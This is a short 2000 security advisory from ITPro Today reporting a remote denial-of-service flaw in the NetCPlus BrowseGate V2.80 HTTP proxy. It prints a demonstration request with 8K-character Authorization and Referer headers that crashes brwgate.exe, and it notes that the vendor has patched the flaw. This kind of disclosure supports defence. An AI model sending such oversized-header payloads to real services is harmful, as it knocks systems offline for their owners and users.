BrowseGate V2.80 is vulnerable to a DoS attack

NetCPlus BrowseGate V2.80 is vulnerable to a remotely executable DoS attack.

Steve Manzuik

September 19, 2000

1 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported September 20, 2000 by Delphis

VERSIONS AFFECTED

DESCRIPTION It is possible for a malicious attacker to remotely cause Browsegate to crash with invalid memory errors.

DEMONSTRATION

An attacker could telnet to port 80, the listening port of Browsegate's HTTP Proxy, and send the following commands;

GET / HTTP/1.0Authorization:     Basic (A x 8k)From:     [email protected]If-Modified-Since:     Sat, 29 Oct 1994 19:43:31 GMTReferer:     http://www.windowsitsecurity.com/ (A x 8K)UserAgent:     Malicious Browser 1.0

This will cause brwgate.exe to crash with it's own error handler.  Please note that "(A x 8k)" denotes 8K of characters and "" is a carriage return.

VENDOR RESPONSE

According to Delphis, NetCPlus has promptly fixed this issue and issued a patch available from their website.

CREDITDiscovered by Delphis

Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like